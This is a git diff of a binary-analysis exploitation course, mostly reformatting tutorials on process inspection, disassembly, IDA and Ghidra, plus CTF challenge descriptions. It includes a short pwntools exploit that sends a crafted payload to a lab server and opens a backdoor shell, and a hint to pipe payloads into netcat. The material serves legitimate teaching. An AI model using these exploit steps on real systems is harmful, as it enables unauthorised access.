+Then run it normally: -``` +```console $ ./crackme6 Type 'start' to begin authentication test ``` Before complying to what the program tells us, let's use `lsof` to see what we can find out: -``` +```console $ lsof -c crackme6 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME crackme6 10466 amadan cwd DIR 8,6 4096 1482769 /home/amadan/projects/sss/session01/06-tutorial-open-files @@ -669,24 +731,28 @@ crackme6 10466 amadan 3w FIFO 0,32 0t0 988920 /tmp/crackme6.fifo crackme6 10466 amadan 4r FIFO 0,32 0t0 988920 /tmp/crackme6.fifo ``` -There seems to be a named pipe used by the executable. Let's look at it: +There seems to be a named pipe used by the executable. +Let's look at it: -``` -$ more /tmp/crackme6.fifo +```console +more /tmp/crackme6.fifo ``` -Now go back again at the `crackme6` console and type `start`. If you see the message that the authentication test has succeeded, quit and try again. If you do not see the message, kill the `crackme6` process, look at the more command output and then delete the pipe file. Now try the password. +Now go back again at the `crackme6` console and type `start`. +If you see the message that the authentication test has succeeded, quit and try again. +If you do not see the message, kill the `crackme6` process, look at the more command output and then delete the pipe file. +Now try the password. -**Misc** +#### Misc There are other sources of information available about running processes if you prefer to do things by hand such as: -* `/proc//environ`: all environment variables given when the process was started -* `/proc//fd`: opened file descriptors. -* `/proc//mem`: address space layout -* `/proc//cwd`: symlink to working directory -* `/proc//exe`: symlink to binary image -* `/proc//cmdline`: complete program commandline, with arguments +- `/proc//environ`: all environment variables given when the process was started +- `/proc//fd`: opened file descriptors. 
+- `/proc//mem`: address space layout +- `/proc//cwd`: symlink to working directory +- `/proc//exe`: symlink to binary image +- `/proc//cmdline`: complete program commandline, with arguments ## Challenges @@ -704,18 +770,20 @@ Use the [lots_of_strings](./activities/08-challenge-lots-of-strings/src) binary. Can you find the **password**? ->Hint: use the tools presented in the tutorials. +Hint: use the tools presented in the tutorials. ### 09. Challenge - Sleepy cats For this task use the [sleepy](./activities/09-challenge-sleepy-cats/src) binary. -The `sleep()` function takes too much. Ain't nobody got time for that. We want the flag NOW!! +The `sleep()` function takes too much. +Ain't nobody got time for that. +We want the flag NOW! Modify the binary in order to get the flag. -> To edit a binary, you can use [vim + xxd](https://vim.fandom.com/wiki/Hex_dump#Editing_binary_files) or `Bless`. -> We strongly encourage you to use `Bless` +To edit a binary, you can use [vim + xxd](https://vim.fandom.com/wiki/Hex_dump#Editing_binary_files) or `Bless`. +We strongly encourage you to use `Bless` ### 10. Challenge - Hidden @@ -723,40 +791,48 @@ For this challenge use the [hidden](./activities/10-challenge-hidden/src) binary Can you find the hidden flag? ->You could use `ltrace` and `strace` to find the flag. But try to make it give you the flag by simply altering the environment, do not attach to the executable. - +You could use `ltrace` and `strace` to find the flag. +But try to make it give you the flag by simply altering the environment, do not attach to the executable. ### 11. Challenge - Detective -This challenge runs remotely at `141.85.224.104:31337`. You can use `netcat` to connect to it. -Investigate the [detective](./activities/11-challenge-detective/src) binary. See what it does and work to get the flag. +This challenge runs remotely at `141.85.224.104:31337`. +You can use `netcat` to connect to it. 
+ +Investigate the [detective](./activities/11-challenge-detective/src) binary. +See what it does and work to get the flag. You can start from the [sol/exploit_template.py](./activities/11-challenge-detective/sol/exploit_template.py) solution template script. ->There is a bonus to this challenge and you will be able to find another flag. See that below. +There is a bonus to this challenge and you will be able to find another flag. +See that below. -**Bonus: Get the Second Flag** +#### Bonus: Get the Second Flag -You can actually exploit the remote [detective](./activities/11-challenge-detective/src) executable and get the second flag. Look thoroughly through the executable and craft your payload to exploit the remote service. +You can actually exploit the remote [detective](./activities/11-challenge-detective/src) executable and get the second flag. +Look thoroughly through the executable and craft your payload to exploit the remote service. ->You need to keep the connection going. Use the construction: `cat /path/to/file - | nc ` +You need to keep the connection going. +Use the construction: `cat /path/to/file - | nc ` ### Extra -If you want some more, have a go at the [bonus](./activities/bonus/src) task. It is a simplified CTF task that you should be able to solve using the information learned in this lab. +If you want some more, have a go at the [bonus](./activities/bonus/src) task. +It is a simplified CTF task that you should be able to solve using the information learned in this lab. -> Hint: This executable needs elevated permissions (run with `sudo`). +Hint: This executable needs elevated permissions (run with `sudo`). ### Further pwning -[pwnable.kr](http://pwnable.kr/) is a wargames site with fun challenges of different difficulty levels. 
After completing all tutorials and challenges in this session, you should be able to go there and try your hand at the following games from Toddler's bottle: `fd`, `collision`, `bof`, `passcode`, `mistake`, `cmd1`, `blukat` (of course, you are encouraged to try any other challenges, but they might get frustrating, as they require knowledge of notions we will explore in future sessions). +[pwnable.kr](http://pwnable.kr/) is a wargames site with fun challenges of different difficulty levels. +After completing all tutorials and challenges in this session, you should be able to go there and try your hand at the following games from Toddler's bottle: `fd`, `collision`, `bof`, `passcode`, `mistake`, `cmd1`, `blukat` (of course, you are encouraged to try any other challenges, but they might get frustrating, as they require knowledge of notions we will explore in future sessions). ## Further Reading -* [ltrace](https://man7.org/linux/man-pages/man1/ltrace.1.html) -* [syscalls](https://man7.org/linux/man-pages/man2/syscalls.2.html) -* [ptrace](https://man7.org/linux/man-pages/man2/ptrace.2.html) -* [ldconfig](https://man7.org/linux/man-pages/man2/ptrace.2.html) -* [socat](https://linux.die.net/man/1/socat) -* [lsof](https://linux.die.net/man/8/lsof) -* [vim + xxd](https://vim.fandom.com/wiki/Hex_dump#Editing_binary_files) +- [ltrace](https://man7.org/linux/man-pages/man1/ltrace.1.html) +- [syscalls](https://man7.org/linux/man-pages/man2/syscalls.2.html) +- [ptrace](https://man7.org/linux/man-pages/man2/ptrace.2.html) +- [ldconfig](https://man7.org/linux/man-pages/man8/ldconfig.8.html) +- [socat](https://linux.die.net/man/1/socat) +- [lsof](https://linux.die.net/man/8/lsof) +- [vim + xxd](https://vim.fandom.com/wiki/Hex_dump#Editing_binary_files) diff --git a/chapters/binary-analysis/static-analysis/demos/01-tutorial-disassemble-methods/README.md b/chapters/binary-analysis/static-analysis/demos/01-tutorial-disassemble-methods/README.md index 02a3cd9..115f659 100644 ---
a/chapters/binary-analysis/static-analysis/demos/01-tutorial-disassemble-methods/README.md +++ b/chapters/binary-analysis/static-analysis/demos/01-tutorial-disassemble-methods/README.md @@ -1 +1 @@ -# Disassemble methods +# Disassemble Methods diff --git a/chapters/binary-analysis/static-analysis/demos/02-tutorial-ida-time/README.md b/chapters/binary-analysis/static-analysis/demos/02-tutorial-ida-time/README.md index 02a3cd9..115f659 100644 --- a/chapters/binary-analysis/static-analysis/demos/02-tutorial-ida-time/README.md +++ b/chapters/binary-analysis/static-analysis/demos/02-tutorial-ida-time/README.md @@ -1 +1 @@ -# Disassemble methods +# Disassemble Methods diff --git a/chapters/binary-analysis/static-analysis/demos/03-tutorial-cpp-executables/README.md b/chapters/binary-analysis/static-analysis/demos/03-tutorial-cpp-executables/README.md index 02a3cd9..115f659 100644 --- a/chapters/binary-analysis/static-analysis/demos/03-tutorial-cpp-executables/README.md +++ b/chapters/binary-analysis/static-analysis/demos/03-tutorial-cpp-executables/README.md @@ -1 +1 @@ -# Disassemble methods +# Disassemble Methods diff --git a/chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py b/chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py index 0598d3c..a8699aa 100644 --- a/chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py +++ b/chapters/binary-analysis/static-analysis/drills/04-challenge-crypto-crackme/sol/crackme-04-gen.py @@ -10,6 +10,7 @@ sha1_key = hashlib.sha1(KEY) digest_key = sha1_key.digest() + def RC4(data, key): x = 0 box = range(256) @@ -23,9 +24,10 @@ def RC4(data, key): y = (y + box[x]) % 256 box[x], box[y] = box[y], box[x] out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256])) - return ''.join(out) + return "".join(out) + -shuffle_key = "".join([ digest_key[7 * i % 20] for i in range(len(digest_key))]) +shuffle_key = 
"".join([digest_key[7 * i % 20] for i in range(len(digest_key))]) rc4_msg = RC4(MSG, KEY) f = open(FILE, "wb") diff --git a/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py b/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py index 81329cf..f4625e3 100755 --- a/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py +++ b/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit.py @@ -4,13 +4,13 @@ payload += p32(0x8049378) payload += b" HTTP/1.1" -io = remote('127.0.0.1', 4242) +io = remote("127.0.0.1", 4242) io.sendline(payload) -sleep(1) # the server is not immediatly created +sleep(1) # the server is not immediately created -io = remote('127.0.0.1', 42042) +io = remote("127.0.0.1", 42042) io.interactive() diff --git a/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py b/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py index 5927e75..4563170 100644 --- a/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py +++ b/chapters/binary-analysis/static-analysis/drills/06-challenge-hyp3rs3rv3r/sol/exploit_template.py @@ -2,12 +2,12 @@ payload = "GET /" -io = remote('127.0.0.1', 4242) +io = remote("127.0.0.1", 4242) -payload = #TODO +payload = TODO io.sendline(payload) -sleep(1) # the server is not immediatly created +sleep(1) # the server is not immediately created -io = remote('127.0.0.1', 42042) +io = remote("127.0.0.1", 42042) io.interactive() diff --git a/chapters/binary-analysis/static-analysis/reading/README.md b/chapters/binary-analysis/static-analysis/reading/README.md index e97fb66..775e4a5 100644 --- a/chapters/binary-analysis/static-analysis/reading/README.md +++ b/chapters/binary-analysis/static-analysis/reading/README.md @@ -1 +1,384 @@ -# Reading +# Static Analysis + +## Table of Contents 
+ +- [Introduction](#introduction) +- [Disassembling executables](#disassembling-executables) + - [Linear Sweep](#linear-sweep) + - [Recursive Traversal](#recursive-traversal) +- [IDA and Ghidra](#ida-and-ghidra) + - [IDA tips & tricks](#ida-tips--tricks) + - [IDA Pro and Ghidra](#ida-pro-and-ghidra) +- [C++](#c) +- [Further reading](#further-reading) +- [Challenges](#challenges) + - [04. crypto_crackme](#04-crypto_crackme) + - [05. broken](#05-broken) + - [06. hyp3rs3rv3r](#06-hyp3rs3rv3r) + +## Introduction + +Sometimes we are either unable or reluctant to run an unknown executable. +This inability to run the file can be caused by a multitude of factors, such as not having the correct dependencies or runtimes for it. +In addition, it is often unsafe to run binaries without analysing them first. +Today we'll learn about one method of analysis, called **static analysis**. + +Thus, static analysis allows us to understand the behaviour of the application by displaying either its assembly code or an equivalent high-level code. +In order to obtain the assembly code, via a procedure called **disassembling**, currently there are two approaches being used, which we'll describe in the following sections. +The high-level code is _deduced_ from the machine code through a more complex process called **decompilation**, which can sometimes make it slightly inaccurate compared to the assembly code. + +## Disassembling Executables + +There are two main strategies when it comes to disassembly. +They are called **Linear Sweep** and **Recursive Traversal**. +As we'll see below, the main difference between the two is their accuracy. + +### Linear Sweep + +The first strategy that we'll look at is _Linear Sweep_. +A very popular tool that uses this strategy is `objdump`. +What _Linear Sweep_ does is it parses the `.text` section of the executable from the beginning to the end and translates each encountered machine code instruction into its equivalent Assembly instruction.
+It's a fast and simple algorithm. +Being so simple, however, renders it vulnerable to being misled. +This can happen in a few ways. +One way is to insert an inappropriate instruction somewhere in the `.text` section. +When the algorithm reaches it, it will try to interpret it as something meaningful and output a completely different Assembly code that would make no sense. + +Let's consider the code below, which is also available [in this repo](https://github.com/hexcellents/sss-exploit/blob/master/sessions/04-static-analysis/activities/01-tutorial-disassemble-methods/src/wrong.c): + +```c +int main() +{ + asm volatile( + "A: jmp B\n\t" + ".byte 0xde\n\t" + ".byte 0xad\n\t" + ".byte 0xc0\n\t" + ".byte 0xde\n\t" + "jmp -1\n\t" + "B:\n\t" + ); + printf("What is wrong with me :-s?\n"); + return -1; +} +``` + +Take a look at the Makefile rule for `wrong` and notice that it **strips** the binary: + +```makefile +wrong: wrong.o + $(CC) $(CFLAGS) $< -o $@ + -strip $@ +``` + +If we remove the line at the end of the snippet above and then disassemble the executable, we can see our inline assembly code (`de ad c0 de`) together with the encoding of `jmp -1`. +The binary code is as expected, but the way it's interpreted is completely off. +This happens because _objdump_ gets "confused" when reaching the bytes `de ad c0 de` and can't figure out that the code is meaningless. + +```asm +080491ab : + 80491ab: eb 09 jmp 80491b6 + 80491ad: de ad c0 de e9 49 fisubr WORD PTR [ebp+0x49e9dec0] + 80491b3: 6e outs dx,BYTE PTR ds:[esi] + 80491b4: fb sti + 80491b5: f7 .byte 0xf7 + +080491b6 : + 80491b6: 83 ec 0c sub esp,0xc +``` + +If we restore the line where the binary is stripped, recompile and disassemble it once more, we see that this time, `objdump` gets completely lost when it encounters our `de ad c0 de` sequence. +This is because, previously, it used symbols in the binary, such as `B`, to figure out where some of the real instructions started.
+Now, without the help of those symbols, `objdump` doesn't manage to output a coherent Assembly code. + +```asm + 804840c: eb 09 jmp 8048417 <__libc_start_main@plt+0x127> + 804840e: de ad c0 de e9 e8 fisubr WORD PTR [ebp-0x17162140] + 8048414: 7b fb jnp 8048411 <__libc_start_main@plt+0x121> + 8048416: f7 83 ec 0c 68 c0 84 test DWORD PTR [ebx-0x3f97f314],0xe8080484 + 804841d: 04 08 e8 + 8048420: ac lods al,BYTE PTR ds:[esi] + 8048421: fe (bad) + 8048422: ff (bad) + 8048423: ff 83 c4 10 b8 ff inc DWORD PTR [ebx-0x47ef3c] + 8048429: ff (bad) + 804842a: ff (bad) + 804842b: ff 8b 4d fc c9 8d dec DWORD PTR [ebx-0x723603b3] + 8048431: 61 popa + 8048432: fc cld + 8048433: c3 ret +``` + +In order to avoid traps like the one showcased above, we need to use smarter disassembly techniques, such as _Recursive Traversal_. + +### Recursive Traversal + +Note that, in the example above, the misleading instruction is never executed. +If it were, the program would crash after receiving a `SIGILL` signal and after outputting `Illegal instruction (core dumped)`, because the CPU would not know how to decode that particular instruction. +But if we run the binary above, we notice that it doesn't crash. +So that instruction is nothing but dead code. +As a result, it's useless to us no matter what it means. +And this is where _Recursive Traversal_ comes in. + +This strategy doesn't start the disassembly at the beginning of the `.text` section, but at the entry point (the address of the `_start` symbol) and disassembles the instructions linearly, while also considering **jumps**. +Thus, when encountering code branches, the algorithm follows them and creates what's called a **Control Flow Graph (CFG)**, where each node is called a **Basic Block (BB)** and is made up of instructions that are always executed in that order, regardless of conditional jumps or function calls. +Take a look at the CFG below and note the BBs and the jumps that make up the arches. 
+The code comes from the `hyp3rs3rv3r` binary, which can be found [here](https://github.com/hexcellents/sss-exploit/tree/master/sessions/04-static-analysis/activities/02-tutorial-ida-time/src). +To make things harder, this executable was also stripped. +![CFG created by IDA](../media/fork_xref_2.png) + +In conclusion, we can look at the CFG as being a DFS (recursive) traversal of the code, separated into BBs, with `ret` instructions acting as _back edges_. + +## IDA and Ghidra + +The tool that we used in order to generate the image above is called [IDA](https://www.hex-rays.com/products/ida/support/download_freeware/). +Next, we'll learn how to use it! + +We'll showcase the functionalities of IDA by disassembling the `hyp3rs3rv3r` binary. +The first screen you are presented with is the following: + +![Initial IDA Screen](../media/ida_initial_screen.png) + +Main components: + +- On the left you have the **Function window** with the list of identified subroutines, functions or external functions called by the binary. +They are color coded according to the legend right above it. +- Under it you have a graph overview of the view presented on the right. +- On the right you have multiple tabs, with the **Function summary** selected in the IDA-view. +We will not be using this. +Instead, we will switch to the complete **Graph View** of functions by pressing the spacebar. +This graph is the CFG we mentioned earlier. + +Upon pressing spacebar and navigating in the **Function window** to functions that are not coloured (meaning they are part of this binary) we get the following view: +![IDA - First View](../media/ida_first_view.png) + +When reversing binaries, we will see this particular Assembly construct a lot, as it is the standard one generated by `gcc`. 
+Remember from [the "Executables and Processes" session](../../executables-and-processes/reading) that [`__libc_start_main`](https://refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/baselib---libc-start-main-.html) is the wrapper that calls `main`. +We now rename the last argument pushed on the stack to `main`. +Press `n` and enter the new name. +Now you have your first function identified. +Click on it to see what `main` does: + +![main](../media/ida_main.png) + +Note how the execution is neatly laid out in the CFG view. +If you look at the left panel you can see the complete view. +The execution is divided because of conditional and unconditional branches. +Let's figure out what happens by analyzing the assembly code: + +First we have the function prologue, stack alignment and stack allocation: + +```asm +push ebp +mov ebp, esp +and esp, 0FFFFFFF0h +sub esp, 450h +``` + +Next, a variable on the stack is initialized to 1. +If you click on `434h` it will become highlighted and you can scroll through the whole function to see where it's used later. +We'll ignore this for now. + +```asm +mov dword ptr [esp+434h], 1 +``` + +Next, we see the first branching: + +```asm +cmp [ebp+arg_0], 2 +jz short loc_8049068 +``` + +**Remember**: +On 32 bit systems, `[ebp + 0]` is the saved `ebp`, `[ebp + 4]` is the return address and `[ebp + 8]` is the first argument to the current function. +IDA follows a slightly different naming convention: `[ebp + 8]` is named `[ebp+arg_0]`, `[ebp + 12]` is named `[ebp+arg_4]`, etc. +You can rename those `arg_*` constructs if you want, anyway. + +So it's referring to the first argument: `argc`. +Basically, what it does is: + +```c +if(argc == 2) { + goto loc_8049068 +} else { +.... +} +``` + +What does the `else` branch do?
+ +```asm +mov eax, [ebp+arg_4] +mov eax, [eax] +mov [esp+4], eax +mov dword ptr [esp], offset format ; "Usage: %s \n" +call _printf + +mov dword ptr [esp], 0 ; status +call _exit +``` + +It's pretty straightforward if you remember the tasks from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats). +The second argument (`argv`) is dereferenced and pushed on the stack along with a format string. +Then `printf` is called. +Next, `exit` is called with a status of 0. + +```c +if(argc == 2) { + goto loc_8049068 +} else { + printf("%s \n", argv[0]); + exit(0); +} +``` + +Now let's do something a bit more advanced: we want to identify the 2 commands that the server accepts by using static analysis. +How do we approach this problem as fast as possible? +We already know that the server accepts multiple clients. +It can do this through forking. +Let's see where `fork` is called in the program. +First find the `fork` function on the left panel and select it. +Now you see a stub to it from the `PLT` section. +We want to find all locations in the program that call this function. +You can achieve this by obtaining all the **cross-references (xrefs)** to it by pressing `x`. +You should get the following screen: + +![fork cross-references 1](../media/fork_xref_1.png) + +Click that location and you will get to the forking point: + +![fork cross-references 2](../media/fork_xref_2.png) + +You can see that the return value is stored on the stack at `[esp+438h]`, some error checking (`perror` and `exit`) is done and then the return value is checked for 0 (as we traditionally do for `fork` calls). +The child will execute `sub_8048ED7` and the parent will loop back. 
+You can rename `sub_8048ED7` to something more legible such as `handle_child_process`. +In this function you can now clearly see the two commands and which function is called for each: + +![handle_child_process](../media/handle_child_process.png) + +It looks like the one on the left, `sub_8048B0B`, handles the `LIST` command so we rename it to `handle_LIST`. +As expected, it calls `opendir` and `readdir` to read all the files in the current directory, then writes them to the socket. + +![handle_LIST](../media/handle_LIST.png) + +### IDA tips & tricks + +- Saving progress is disabled for the trial version. + However, you can save a limited (but useful) subset of your work using `File -> Produce File -> Dump database to IDC file` and then load it next time using `File -> Script File`. +- If you close some windows and don't know how to get them back you can reset the layout using `Windows->Reset Desktop`. +- If you want to return to the previous view you can press `Escape`. +- When you want to view code as in `objdump` you only need to press `Spacebar` once. + And then again to return to CFG mode. +- If there is a hex value and you want to convert it to decimal (or back) press `h`. +- Converting hex/dec values to _ASCII_: press `r`. +- If you want to write comments next to an instruction or a function press `:`. + +### IDA Pro and Ghidra + +IDA Pro is installed on the Kali virtual machine. +The main difference between it and the free version is that the Pro one can also **decompile** the code based on the CFGs listed above. +This will be extremely useful as we hack more and more binaries. + +Another tool that is capable of decompiling the code in an executable is [Ghidra](https://ghidra-sre.org/). +One advantage of Ghidra over IDA is that Ghidra displays both the C and the Assembly code side by side. +This allows us to correlate the two and reap the benefits of both of them at the same time.
+ +## C++ + +Things look slightly different when we try to hack executables that have been compiled from C++ code, instead of C. +The difference comes from the way symbols (method symbols in particular) are handled by C++ compilers. +Let's disassemble the code below and see how its symbols look: + +```cpp +#include <iostream> +using namespace std; +int main() +{ + cout << "Hello world" << endl; + return 0; +} +``` + +Disassembling it in IDA looks familiar at first: + +![IDA start](../media/ida_c%2B%2B_start.png) + +But then the fun starts: + +![IDA main](../media/ida_c%2B%2B_main.png) + +As we can see, all symbols look almost as if they were encrypted. +In fact, this process is called **name mangling**. +If we take a closer look at them, however, we can distinguish some clues about those function calls. +For example, the first one contains the sequences `char_traits` and `basic_ostream`, the former being a C++ abstraction for string operations, while the latter is a base class for output operators, such as `<<`. + +IDA can demangle strings such as the ones above by itself. +Some recommended settings (you may prefer something different) are the following: + +- `Options -> Demangled names` +- Show demangled C++ names as `Names` +- `Setup short names` +- Click `Only main name` + +These settings only display the important classes and namespaces that make up each method, like this: + +![IDA demangled](../media/ida_c%2B%2B_demangled.png) + +## Further reading + +More information about name mangling can be obtained at: + +- <https://en.wikipedia.org/wiki/Name_mangling> +- on demand demangling: <http://demangler.com/> or `c++filt` + +You can find out more information about the internals of C++ in general, using the following references: + +- <https://ocw.cs.pub.ro/courses/cpl/labs/06> (in Romanian) +- <https://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf> +- <http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf> + +## Challenges + +### 04. crypto_crackme + +The `crypto_crackme` binary is an application that asks for a secret and uses it to decrypt a message. +In order to solve this task, you have to retrieve the message. + +- Open the binary using IDA and determine the program control flow.
+ What is it doing after fetching the secret? + It seems to be consuming a lot of CPU cycles. + If possible, use IDA to patch the program and reduce the execution time of the application. + Use `Edit -> Patch program -> Change byte...`. +- Next, it looks like the program tries to verify if the secret provided is correct. + Where is the secret stored? + Is it stored in plain text? + Find out what the validation algorithm is. +- Now break it and retrieve the message! + +**Important!**: +Unfortunately, the virtual machine doesn't support the `libssl1.0.0` version of the SSL library. +Use the library files in the task archive and run the executable using: + +```console +LD_LIBRARY_PATH=. ./crypto_crackme +``` + +You can break password hashes (including SHA1) on [CrackStation](https://crackstation.net/). + +### 05. broken + +The `broken` binary is asking you for the correct password. +Investigate the binary and provide it with the correct password. +If you provide the correct password, the message `That's correct! The password is '...'` is displayed. + +### 06. hyp3rs3rv3r + +Investigate the `hyp3rs3rv3r` binary and find out where the backdoor function is. +Note that since it's not directly called, IDA doesn't think of it as a procedure, so it won't come up on the left pane. +Figure out a way around this. +When you find that code block you can press `p` on the first instruction to help IDA see it as a procedure. + +**Hint**: +In order to exploit the vulnerability in Ubuntu, you should use `netcat-traditional`. +You can switch from `netcat-openbsd` to `netcat-traditional` using the steps described [here](https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu).
diff --git a/chapters/binary-analysis/static-analysis/reading/README_2.md b/chapters/binary-analysis/static-analysis/reading/README_2.md deleted file mode 100644 index 00a9720..0000000 --- a/chapters/binary-analysis/static-analysis/reading/README_2.md +++ /dev/null @@ -1,301 +0,0 @@ -# Static Analysis - -## Table of Contents - -- [Introduction](#introduction) -- [Disassembling executables](#disassembling-executables) - - [Linear Sweep](#linear-sweep) - - [Recursive Traversal](#recursive-traversal) -- [IDA and Ghidra](#ida-and-ghidra) - - [IDA tips & tricks](#ida-tips--tricks) - - [IDA Pro and Ghidra](#ida-pro-and-ghidra) -- [C++](#c) -- [Further reading](#further-reading) -- [Challenges](#challenges) - - [04. crypto_crackme](#04-crypto_crackme) - - [05. broken](#05-broken) - - [06. hyp3rs3rv3r](#06-hyp3rs3rv3r) - -# Introduction - -Sometimes we are either unable or reluctant to run an unknown executable. This inability to run the file can be caused by a multitude of factors, such as not having the correct dependencies or runtimes for it. In addition, it is often unsafe to run binaries without analysing them first. Today we'll learn about one method of analysis, called **static analysis**. - -Thus, static analysis allows us to understand the behaviour of the application by displaying either its assembly code or an equivalent high-level code. In order to obtain the assembly code, via a procedure called **disassembling**, currently there are two approaches being used, which we'll describe in the following sections. The high-level code, is _deduced_ from the machine code, through a more complex process called **decompilation**, which sometimes might make it a bit inaccurate, when compared to the assembly code. - -# Disassembling executables - -There are two main strategies when it comes to disassembly. They are called **Linear Sweep** and **Recursive Traversal**. 
As we'll see below, the main difference between the two is their accuracy - -## Linear Sweep - -The first strategy that we'll look at is _Linear Sweep_. A very popular tool that uses this strategy is `objdump`. What _Linear Sweep_ does is it parses the `.text` section of the executable from the beginning to the end and translates each encountered machine code instruction into its equivalent Assembly instruction. It's a fast and simple algorithm. Being so simple, however, renders it vulnerable to being mislead. This can happen in a few ways. One way is to insert an inappropriate instruction somewhere in the `.text` section. When the algorithm reaches it, it will try to interpret it as something meaningful and output a completely different Assembly code that would make no sense. - -Let's consider the code below, which is also available [in this repo](https://github.com/hexcellents/sss-exploit/blob/master/sessions/04-static-analysis/activities/01-tutorial-disassemble-methods/src/wrong.c): - -```c -int main() -{ - asm volatile( - "A: jmp B\n\t" - ".byte 0xde\n\t" - ".byte 0xad\n\t" - ".byte 0xc0\n\t" - ".byte 0xde\n\t" - "jmp -1\n\t" - "B:\n\t" - ); - printf("What is wrong with me :-s?\n"); - return -1; -} -``` - -Take a look at the Makefile rule for `wrong` and notice that it **strips** the binary: - -```makefile -wrong: wrong.o - $(CC) $(CFLAGS) $< -o $@ - -strip $@ -``` - -If we remove the line at the end of the snipped above and then disassemble the executable, we can see our inline assembly code (`de ad c0 de`) together with the encoding of `jmp -1`. The binary code is as expected, but the way it's interpreted is completely off. This happens because _objdump_ gets "confused" when reaching the bytes `de ad c0 de` and can't figure out that that code is meaningless. 
- -```asm -080491ab : - 80491ab: eb 09 jmp 80491b6 - 80491ad: de ad c0 de e9 49 fisubr WORD PTR [ebp+0x49e9dec0] - 80491b3: 6e outs dx,BYTE PTR ds:[esi] - 80491b4: fb sti - 80491b5: f7 .byte 0xf7 - -080491b6 : - 80491b6: 83 ec 0c sub esp,0xc -``` - -If we restore the line where the binary is stripped, recompile and disassemble it once more, we see that this time, `objdump` gets completely lost when it encounters our `de ad c0 de` sequence. This is because, previously, it used symbols in the binary, such as `B`, to figure out where some of the real instructions started. Now, without the help of those symbols, `objdump` doesn't manage to output a coherent Assembly code. - -```asm - 804840c: eb 09 jmp 8048417 <__libc_start_main@plt+0x127> - 804840e: de ad c0 de e9 e8 fisubr WORD PTR [ebp-0x17162140] - 8048414: 7b fb jnp 8048411 <__libc_start_main@plt+0x121> - 8048416: f7 83 ec 0c 68 c0 84 test DWORD PTR [ebx-0x3f97f314],0xe8080484 - 804841d: 04 08 e8 - 8048420: ac lods al,BYTE PTR ds:[esi] - 8048421: fe (bad) - 8048422: ff (bad) - 8048423: ff 83 c4 10 b8 ff inc DWORD PTR [ebx-0x47ef3c] - 8048429: ff (bad) - 804842a: ff (bad) - 804842b: ff 8b 4d fc c9 8d dec DWORD PTR [ebx-0x723603b3] - 8048431: 61 popa - 8048432: fc cld - 8048433: c3 ret -``` - -In order to avoid traps like the one showcased above, we need to use smarter disassembly techniques, such as _Recursive Traversal_. - -## Recursive Traversal - -Note that, in the example above, the misleading instruction is never executed. If it were, the program would crash after receiving a `SIGILL` signal and after outputting `Illegal instruction (core dumped)`, because the CPU would not know how to decode that particular instruction. But if we run the binary above, we notice that it doesn't crash. So that instruction is nothing but dead code. As a result, it's useless to us no matter what it means. And this is where _Recursive Traversal_ comes in. 
- -This strategy doesn't start the disassembly at the beginning of the `.text` section, but at the entry point (the address of the `_start` symbol) and disassembles the instructions linearly, while also considering **jumps**. Thus, when encountering code branches, the algorithm follows them and creates what's called a **Control Flow Graph (CFG)**, where each node is called a **Basic Block (BB)** and is made up of instructions that are always executed in that order, regardless of conditional jumps or function calls. Take a look at the CFG below and note the BBs and the jumps that make up the arches. The code comes from the `hyp3rs3rv3r` binary, which can be found [here](https://github.com/hexcellents/sss-exploit/tree/master/sessions/04-static-analysis/activities/02-tutorial-ida-time/src). To make things harder, this executable was also stripped. -![CFG created by IDA](../media/fork_xref_2.png) - -In conclusion, we can look at the CFG as being a DFS (recursive) traversal of the code, separated into BBs, with `ret` instructions acting as _back edges_. - -# IDA and Ghidra - -The tool that we used in order to generate the image above is called [IDA](https://www.hex-rays.com/products/ida/support/download_freeware/). Next, we'll learn how to use it! - -We'll showcase the functionalities of IDA by disassembling the `hyp3rs3rv3r` binary. The first screen you are presented with is the following: -![Initial IDA Screen](../media/ida_initial_screen.png) - -Main components: - -- On the left you have the **Function window** with the list of identified subroutines, functions or external functions called by the binary. They are color coded according to the legend right above it. -- Under it you have a graph overview of the view presented on the right. -- On the right you have multiple tabs, with the **Function summary** selected in the IDA-view. We will not be using this. Instead, we will switch to the complete **Graph View** of functions by pressing the spacebar. 
This graph is the CFG we mentioned earlier. - -Upon pressing spacebar and navigating in the **Function window** to functions that are not coloured (meaning they are part of this binary) we get the following view: -![IDA - First View](../media/ida_first_view.png) - -When reversing binaries, we will see this particular Assembly construct a lot, as it is the standard one generated by `gcc`. Remember from [Session 02](https://github.com/hexcellents/sss-exploit/tree/master/sessions/03-executable-file-formats) that [\_\_libc_start_main](refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/baselib---libc-start-main-.html) is the wrapper that calls `main`. We now rename the last argument pushed on the stack to main. Press `n` and enter the new name. Now you have your first function identified. Click on it to see what `main` does: -![main](../media/ida_main.png) - -Note how the execution is neatly layed out in the CFG view. If you look at the left panel you can see the complete view. The execution is divided because of conditional and unconditional branches. Let's figure out what happens by analyzing the assembly code: - -First we have the function prologue, stack alignment and stack allocation: - -```asm -push ebp -mov ebp, esp -and esp, 0FFFFFFF0h -sub esp, 450h -``` - -Next, a variable on the stack is initialized to 1. If you click on `434h` it will become highlighted and you can scroll through the whole function to see where it's used later. We'll ignore this for now. - -```asm -mov dword ptr [esp+434h], 1 -``` - -Next, we see the first branching: - -``` -cmp 